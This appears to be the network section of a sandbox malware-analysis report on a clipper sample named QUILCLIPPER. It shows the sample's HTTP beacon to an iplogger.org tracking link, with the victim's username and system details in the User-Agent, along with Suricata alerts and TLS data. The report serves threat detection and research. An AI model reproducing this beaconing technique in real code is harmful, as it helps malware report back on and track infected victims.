Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| iplogger.org | 88.99.66.31 |
- TCP Requests
GET
200
https://iplogger.org/1hkvy7
REQUEST
RESPONSE
BODY
GET /1hkvy7 HTTP/1.1
User-Agent: QUILCLIPPER by MickeyMF / UserName: test22 / System: Windows 7 X64 (Session: 20462)
Host: iplogger.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 09 Nov 2021 23:25:20 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=oa2etevrbosfj6fvgd18ilh7e2; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242547871; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 9fa2c487d92758adcb13ab4275363b3c9f5eba974a2c36934af67172012c62a4
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49166 -> 88.99.66.31:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49166 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
Snort Alerts
No Snort Alerts